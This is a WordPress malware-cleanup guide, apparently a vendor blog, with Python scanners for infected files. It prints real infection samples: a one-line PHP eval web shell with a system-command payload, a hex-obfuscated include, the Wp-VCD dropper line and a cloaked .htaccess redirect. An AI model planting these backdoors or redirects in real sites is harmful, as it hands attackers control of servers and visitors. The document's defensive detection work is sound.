How to Scan & Fix Infected WordPress Files?


WordPress has made creating websites incredibly simple, allowing people and businesses of all sizes to have an online presence.

Securing your WordPress site is critical once it is live. The last thing you want to discover in the morning is that the site has been hacked and that months of development and SEO work have been undone without your knowledge.

Hackers frequently target WordPress, and its themes and plugins, because of its popularity. If they discover a flaw in one plugin, they can exploit practically every site that uses it.

Consider the recent unrestricted file upload vulnerability in the Contact Form 7 plugin. Once it was disclosed, more than 5 million websites using the plugin were believed to be exposed. The flaw let an attacker upload a file of any type, bypassing the restrictions a form placed on allowed upload types, and so plant a web shell on any site running Contact Form 7 version 5.3.1 or earlier with file upload enabled on a form.

Similarly, the Slider Revolution plugin had a local file inclusion (LFI) vulnerability that let attackers download wp-config.php from vulnerable sites. That disclosed database credentials, security keys and other critical configuration details, and it is the attack that came to be called the "wp-config.php hack".

In this article we go through the crucial files and locations on a WordPress site that are most often hacked or infected with malware, and how to check and clean them.

Commonly Hacked WordPress Files

WordPress wp-config.php Hack

The wp-config.php file is essential to any WordPress installation. It is the site's configuration file and tells WordPress how to reach its database. It contains private data such as:

  • Database host
  • Username, password, & port number
  • Database name
  • Security keys for WordPress
  • Database table prefix

Because of this sensitive content it is a favourite target for hackers. Last year the Duplicator plugin was found to have a serious unauthenticated arbitrary file download vulnerability, which attackers used to download wp-config.php.

Once they have the database credentials from a wp-config.php attack, hackers connect to the database and create fake WordPress admin accounts for themselves. That gives them complete control of the site as well as the database: user password hashes, email addresses, files, photos, WooCommerce transaction details and so on. They may also install a backdoor such as Filesman to keep access to the site. Note that using the credentials directly requires the database host to be reachable from the attacker's network; when it only listens on localhost, the credentials are instead combined with another foothold on the same server.

WordPress index.php Hacked

Every WordPress site's index.php is the front controller: every front-end request passes through it, so code injected there runs on every page of the site.

For instance, the pub2srv and favicon malware campaigns target index.php. Researchers at Astra Security monitoring this widespread redirection campaign saw malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; added to index.php files, together with the code in the screenshot below. The hex escapes decode to //sgb/favicon_54e6ed.ico, a PHP payload disguised as an icon file that is then included into every request.

[Screenshot: malicious code injected into a WordPress index.php file]

Some campaigns instead rename index.php to index.php.bak, so the site crashes and does not load at all.

Malicious code in index.php typically shows visitors unusual pop-ups or adverts, or redirects them to spammy sites. To detect a hack, compare the file with the copy shipped in the matching WordPress release (or verify its checksum against the official list).

WordPress .htaccess File Hacked

The .htaccess file, usually found in the root directory of your WordPress site, configures the web server's behaviour for that directory tree. It is specific to Apache (nginx ignores it), and it is a powerful way to control the performance, behaviour and security of the site. It is commonly used to:

  • Restrict access to specific site directories
  • Set the site's maximum memory consumption
  • Create redirects
  • Force HTTPS
  • Organize caching
  • Block some script injection attempts
  • Limit the size of uploaded files
  • Stop bots from enumerating usernames
  • Block image hotlinking
  • Force files to download rather than display
  • Manage file extensions

When the site is compromised, these same capabilities are turned against it: .htaccess is commonly injected with rules that redirect visitors elsewhere to collect clicks for the attacker, or to show them spam. Take a look at the example code below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The RewriteRule on the last line sends matching visitors to http://MaliciousDomain.tld/bad.php?t=3, which then loads whatever bad.php serves. The RewriteCond lines before it gate the redirect on the HTTP Referer, so only visitors arriving from a search engine (the google pattern is the one left readable in this sample) are redirected, while the site owner, who usually types the address directly, sees a normal site. If you notice unusual redirects from your site, .htaccess is the first place to look. If you don't find the file, or it is empty, do not panic: WordPress does not need it unless you use pretty permalinks.
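The referrer-cloaked redirect above is easy to miss by eye in a long .htaccess, so here is an added example (not code from the original article) that parses RewriteCond/RewriteRule pairs and reports any rule whose target is an absolute URL on a host other than the site's own, flagging it as cloaked when the conditions test the Referer or User-Agent. It models the two mod_rewrite facts that matter: each RewriteCond applies only to the next RewriteRule, and an absolute URL target is an external redirect even without the R flag. The sample .htaccess and the hostnames in it are constructed for the demo.

```python
"""Flag conditional redirects to outside hosts in an .htaccess file."""
import re
from urllib.parse import urlparse

COND_RE = re.compile(r'^RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
RULE_RE = re.compile(r'^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
# Conditions on these variables are the usual cloaking trick: redirect
# search-engine visitors, show the owner (who visits directly) a clean site.
CLOAKING_VARS = {'%{HTTP_REFERER}', '%{HTTP_USER_AGENT}'}


def find_suspicious_redirects(htaccess_text, own_hosts):
    """Return one finding per RewriteRule that redirects off-site.

    own_hosts: hostnames the site legitimately redirects to (case-insensitive).
    """
    own_hosts = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # RewriteCond lines collected for the next RewriteRule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append((cond.group(1), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        conds, pending = pending, []  # conditions belong to this rule only
        target = rule.group(2)
        parsed = urlparse(target)
        if parsed.scheme.lower() not in ('http', 'https'):
            continue  # '-' (no substitution) or a same-site path
        host = (parsed.hostname or '').lower()
        if host in own_hosts:
            continue
        gated = [var for var, _ in conds if var.upper() in CLOAKING_VARS]
        findings.append({
            'line': lineno,
            'host': host,
            'target': target,
            'conditions': conds,
            'cloaked': bool(gated),
            'severity': 'high' if gated else 'medium',
        })
    return findings


# Constructed sample: the standard WordPress block, a legitimate 301 to the
# site's own domain, then an injected referrer-cloaked redirect.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteRule ^old-page$ https://example.com/new-page [R=301,L]
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

if __name__ == '__main__':
    for f in find_suspicious_redirects(SAMPLE_HTACCESS, {'example.com'}):
        vars_ = ', '.join(v for v, _ in f['conditions']) or 'nothing'
        print(f"line {f['line']}: {f['severity']} redirect to {f['host']} "
              f"(conditioned on {vars_})")
```

Run it against the real file with the site's own hostnames in own_hosts; anything it reports with cloaked set is almost never legitimate, while an unconditional off-site redirect may simply be an old migration rule and needs a human look.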

WordPress footer.php & header.php (WordPress Theme Files Hacked)

Each WordPress theme has a header.php and a footer.php containing the markup for the site's header and footer. These files hold the scripts and widgets that appear on every page: a share or social-networking widget at the bottom of the site, for instance, or simply copyright information and credits.

Because they load on every page, these two files are prime targets. As in the digestcolect[.com] redirect malware, they are frequently used for malicious redirects and for presenting spam content.

We decoded part of the injected payload and found that the attackers used browser cookies to identify returning visitors and serve them malicious adverts, among other things.

In another case the attackers injected JavaScript into every file with a .js extension. Infections of that size are hard to clean completely because of the sheer number of files touched.

WordPress functions.php Hacked

The functions.php file in a theme folder works much like a plugin: it extends the operation and features of a WordPress site. It is typically used to:

  • Hook into WordPress actions and filters
  • Call native PHP functions
  • Define your own functions

Every theme ships a functions.php, but remember that only the active theme's functions.php is loaded at any one time (plus its parent's, when a child theme is active). That is why the Wp-VCD backdoor specifically targeted functions.php. This malware infiltrated sites, created new admin users and injected spam pages such as pharma and Japanese SEO spam. The dropper line it adds looks like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

The line above includes class.theme-modules.php, which then injects the malware into the site's other themes (even inactive ones), creates new users and plants backdoors. Because the infection re-propagates from the other themes, attackers kept their access even after the first file had been cleaned.

WordPress wp-load.php Hacked

Every WordPress site has a wp-load.php. It bootstraps the WordPress environment and gives plugins access to core functionality. As seen with the China Chopper web shell, many malware families infiltrate sites by dropping look-alike files such as wp-load-eFtAh.php next to it. Because the name resembles the real file's, it is easy to overlook in an FTP listing. Such a file may contain no more than:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This one-liner lets the attacker run any PHP code supplied in the pass parameter. Because the backdoor reads $_POST, the payload is sent in the body of a POST request to the file, for instance pass=system("killall -9 apache"); which would kill whatever web-server processes the PHP user is permitted to signal and could take the whole site down. Don't judge this code by its length: it hands remote control of the server to anyone who finds the file.

Flood of class-wp-cache.php Files on the Server

In one recent breach we saw a cPanel account, and the whole web server, fill up with dozens or even thousands of class-wp-cache.php files dropped into every folder of the site, including the core directories. The usual origin of such an infection is a vulnerability in the site's own code or a plugin that gives the attacker write access to the file system.
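The indicators described in the index.php, functions.php, wp-load.php and class-wp-cache.php sections above can all be found with one file-system walk. The scanner below is an added example, not code from the original article or from Astra Security. It reports four kinds of indicator: eval() of request input (the wp-load-eFtAh.php backdoor), an include/require of a hex-escaped string (the favicon include in index.php, which it decodes), the class.theme-modules.php include that Wp-VCD drops into functions.php, and look-alike or flooded file names (wp-load-*.php, index.php.bak, class-wp-cache.php copies). The mini site tree it builds for the demo is constructed and contains no real WordPress core code; the file names and thresholds are assumptions for illustration.

```python
"""Scan a WordPress tree for the file-level indicators discussed above."""
import os
import re
import tempfile
from collections import defaultdict, namedtuple

Finding = namedtuple('Finding', 'kind path detail')

# eval()/assert() fed straight from user input, optionally via base64_decode()
EVAL_INPUT = re.compile(
    r'@?\b(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b')
# include/require of a double-quoted string containing \xNN escapes
ESCAPED_INCLUDE = re.compile(
    r'\b(?:include|include_once|require|require_once)\b\s*\(?\s*'
    r'"((?:[^"\\]|\\.)*?\\x(?:[^"\\]|\\.)*)"')
WP_VCD_DROPPER = re.compile(r'class\.theme-modules\.php')
# names that mimic core files or are left behind by the campaigns above
SUSPICIOUS_NAME = re.compile(
    r'^(?:wp-load-[A-Za-z0-9]+\.php|class-wp-cache\.php|index\.php\.bak)$')
FLOOD_THRESHOLD = 3          # same name in this many directories => flood
FLOOD_ALLOWLIST = {'index.php'}  # "Silence is golden" files are everywhere


def decode_php_escapes(s):
    """Resolve PHP double-quoted escapes such as \\x2f into the real path."""
    return s.encode('latin-1', 'replace').decode('unicode_escape')


def scan_wordpress_tree(root):
    findings = []
    dirs_by_name = defaultdict(set)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            dirs_by_name[name].add(dirpath)
            if SUSPICIOUS_NAME.match(name):
                findings.append(Finding('suspicious-filename', rel, name))
            if not name.endswith('.php'):
                continue
            with open(path, encoding='utf-8', errors='replace') as fh:
                code = fh.read()
            m = EVAL_INPUT.search(code)
            if m:
                findings.append(Finding('eval-of-request-input', rel, m.group(0)))
            for m in ESCAPED_INCLUDE.finditer(code):
                findings.append(Finding('obfuscated-include', rel,
                                        decode_php_escapes(m.group(1))))
            if name == 'functions.php' and WP_VCD_DROPPER.search(code):
                findings.append(Finding('wp-vcd-dropper', rel, 'class.theme-modules.php'))
    for name, dirs in dirs_by_name.items():
        if name not in FLOOD_ALLOWLIST and len(dirs) >= FLOOD_THRESHOLD:
            findings.append(Finding('file-flood', name, f'{len(dirs)} directories'))
    return findings


def build_sample_site(root):
    """Write a small constructed tree mixing clean and infected files."""
    files = {
        # favicon campaign: hex-escaped include prepended to the front controller
        'index.php': r'<?php @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; '
                     r'define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php";',
        'index.php.bak': '<?php // original file renamed by the infection',
        'wp-load.php': '<?php // placeholder for the real bootstrap file',
        # look-alike backdoor (the one-liner quoted in the article)
        'wp-load-eFtAh.php': "<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>",
        # Wp-VCD dropper line in the active theme
        'wp-content/themes/twentytwenty/functions.php':
            "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
            "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>",
        'wp-content/themes/twentytwenty/index.php': '<?php get_header(); ?>',
        'wp-content/index.php': '<?php // Silence is golden.',
        'wp-content/plugins/index.php': '<?php // Silence is golden.',
        'wp-content/themes/index.php': '<?php // Silence is golden.',
        # class-wp-cache.php flood across core and upload directories
        'wp-admin/class-wp-cache.php': '<?php // dropper copy',
        'wp-includes/class-wp-cache.php': '<?php // dropper copy',
        'wp-content/uploads/class-wp-cache.php': '<?php // dropper copy',
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='utf-8') as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_wordpress_tree(root)


if __name__ == '__main__':
    for f in sorted(demo()):
        print(f'{f.kind:24} {f.path:48} {f.detail}')
```

Point scan_wordpress_tree at a real document root to triage a site. The patterns are deliberately narrow (they are the indicators this article describes, not a general malware signature set), so a clean report does not prove a clean site; a hit, on the other hand, is worth restoring from a known-good copy rather than hand-editing.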

How to Perform a WordPress Files Cleanup & Secure them

Cleaning files

Start by identifying how the attack happened (a wp-config.php hack, a vulnerable plugin, and so on) and closing that hole; otherwise the cleaned files will simply be reinfected. Then remove the malicious or obfuscated code. Where possible, restore the affected files from a clean backup; if none is available, the original files for every release are published on wordpress.org and mirrored on GitHub. Take a backup before changing anything: a mistake made while removing code can take the site down.

Securing the site using plugins

Attackers frequently modify core CMS files during such attacks, so check whether any core WordPress file has been changed. Customers of Astra Security have this check built in and are notified automatically when a change is detected.
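The check recommended here, and in the index.php section earlier, is a comparison of core files against the checksums WordPress publishes for each release. The following is an added example, not the article's or Astra Security's code, and not a substitute for WP-CLI's wp core verify-checksums, which does the same job. The checksum map has the shape of the "checksums" object returned by https://api.wordpress.org/core/checksums/1.0/?version=VERSION&locale=LOCALE (relative path to MD5 of the file in that release); the demo builds one from a constructed pristine tree instead of fetching it, then tampers with the tree and verifies. Alongside modified and missing files it also reports files present in core locations that are not on the list at all, which is how a dropped wp-load-eFtAh.php shows up.

```python
"""Verify WordPress core files against a release checksum list."""
import hashlib
import json
import os
import tempfile

CORE_DIRS = ('wp-admin/', 'wp-includes/')


def md5_of(path):
    h = hashlib.md5()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b''):
            h.update(chunk)
    return h.hexdigest()


def is_core_path(rel):
    """Paths where every file should be accounted for by the checksum list.

    wp-config.php is site-specific and never on the list; wp-content is
    skipped because themes, plugins and uploads are not core. Root-level
    files are limited to *.php for this example.
    """
    if rel == 'wp-config.php':
        return False
    return rel.startswith(CORE_DIRS) or ('/' not in rel and rel.endswith('.php'))


def core_files(root):
    for dirpath, _, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, '/')
            if is_core_path(rel):
                yield rel


def load_checksums(api_json_text):
    """Parse the api.wordpress.org response body into {path: md5}."""
    return json.loads(api_json_text)['checksums']


def snapshot_checksums(root):
    """Checksum map from a tree known to be clean (stand-in for the API call)."""
    return {rel: md5_of(os.path.join(root, rel)) for rel in core_files(root)}


def verify_core_checksums(root, checksums):
    modified, missing = [], []
    for rel, expected in checksums.items():
        full = os.path.join(root, *rel.split('/'))
        if not os.path.isfile(full):
            missing.append(rel)
        elif md5_of(full) != expected.lower():
            modified.append(rel)
    # A rogue file in a core location matters as much as a changed one:
    # the published list only covers files that ship with WordPress.
    unexpected = [rel for rel in core_files(root) if rel not in checksums]
    return {'modified': sorted(modified), 'missing': sorted(missing),
            'unexpected': sorted(unexpected)}


def _write(root, rel, text):
    full = os.path.join(root, *rel.split('/'))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, 'w', encoding='utf-8') as fh:
        fh.write(text)


def demo():
    """Constructed tree: snapshot it clean, then tamper with it and verify."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, 'index.php', "<?php define('WP_USE_THEMES', true); "
                                  "require __DIR__ . '/wp-blog-header.php';\n")
        _write(root, 'wp-load.php', "<?php // bootstrap placeholder\n")
        _write(root, 'wp-includes/version.php', "<?php $wp_version = 'x.y';\n")
        _write(root, 'wp-admin/admin.php', "<?php // admin placeholder\n")
        _write(root, 'wp-config.php', "<?php define('DB_PASSWORD', 'secret');\n")
        _write(root, 'wp-content/themes/twentytwenty/functions.php', "<?php // theme code\n")
        checksums = snapshot_checksums(root)
        # simulate the compromises described in the article
        with open(os.path.join(root, 'index.php'), 'a', encoding='utf-8') as fh:
            fh.write('<?php @include "//sgb/favicon_54e6ed.ico"; ?>\n')
        os.remove(os.path.join(root, 'wp-includes', 'version.php'))
        _write(root, 'wp-load-eFtAh.php', "<?php @eval($_POST['pass']); ?>\n")
        return verify_core_checksums(root, checksums)


if __name__ == '__main__':
    for kind, paths in demo().items():
        print(f'{kind}: {paths}')
```

MD5 is adequate here because the reference hashes come from wordpress.org rather than from the suspect host; an attacker who can edit files on the server cannot also edit the published list. Remember that wp-content is outside this check, so theme and plugin files still need the scan described earlier.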

Once you have reviewed the changes to core files, scan the site with a malware scanning service such as Astra Security to find files with malicious content. Such tools produce a report listing malware files, malicious links and, where it can be determined, the cause of the hack.

Hide sensitive files

As the wp-config.php hack shows, exposing files to curious eyes reveals important information, so sensitive files should be kept out of reach on the server. The .htaccess file can help protect them.

The uploads directory is where a web shell uploaded through a form bug (such as the Contact Form 7 one) usually lands, so create an .htaccess file in wp-content/uploads with the following content to stop any PHP file there from being executed:

# Kill PHP Execution
<Files ~ "\.ph(?:p[0-9]?|ar|t|tml)$">
deny from all
</Files>

The pattern covers .php, .phtml, .pht, .phar and the numbered variants (.php7 and .php8 are common on newer hosts), which the usual .ph(?:p[345]?|t|tml) pattern misses. On Apache 2.4 the native form of the directive is Require all denied; deny from all keeps working only while mod_access_compat is loaded. On nginx, .htaccess is ignored and the equivalent rule must go in the server configuration.

PHP files in wp-includes are never meant to be requested directly by a browser. To block such requests, add the following to the .htaccess file in the root of your site. The first rule also blocks wp-admin/includes; the S=3 flag skips the three wp-includes rules for any request outside that directory. On a multisite install, wp-includes/ms-files.php must remain reachable, so this block cannot be used as-is there.

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

Alternatively, you can install the WP Hardening plugin and skip the manual steps. With the click of a button it hides important locations such as wp-content and wp-content/uploads and hardens several other sensitive areas of the site, making it harder for attackers to find and exploit sensitive information.

Updating WordPress

Keep your WordPress installation, plugins and themes up to date at all times; running the current versions closes most of the holes that are exploited in practice. Use only well-known plugins and themes, and avoid poorly coded or nulled ones. This protects against attacks like the wp-config.php hack, which rely on known plugin vulnerabilities.

Use a WordPress Firewall

A web application firewall can significantly improve the security of your site. It inspects incoming traffic and blocks requests that match known attack patterns before they reach WordPress, including attempts like the wp-config.php hack. There are a variety of low-cost firewall options on the market today; the one at Astra Security is adaptable to your requirements.

The Astra firewall blocks SQL injection, code injection, XSS, CSRF and 100+ other attack classes in real time. It also monitors the site continuously, detecting and blocking suspicious login attempts against your instance.

WordPress Security Audit or Pen testing

Attackers are continually on the lookout for exploitable vulnerabilities in WordPress sites because it is the most popular CMS in use and hence a high-value target. Penetration testing a WordPress site has therefore become critical to keeping it safe from attack.

Penetration testing is a simulated attack on a web application, network or system to assess its security and identify weaknesses before a real attacker does. One of the simulated attacks carried out when pen-testing a WordPress site is a check for directory listing, which exposes the contents of directories such as wp-includes, wp-admin and wp-content to anyone who browses to them. That reveals installed plugins and themes, and any leftover copies or backups of files such as wp-config.php, index.php or wp-load.php, which is valuable information for an attacker.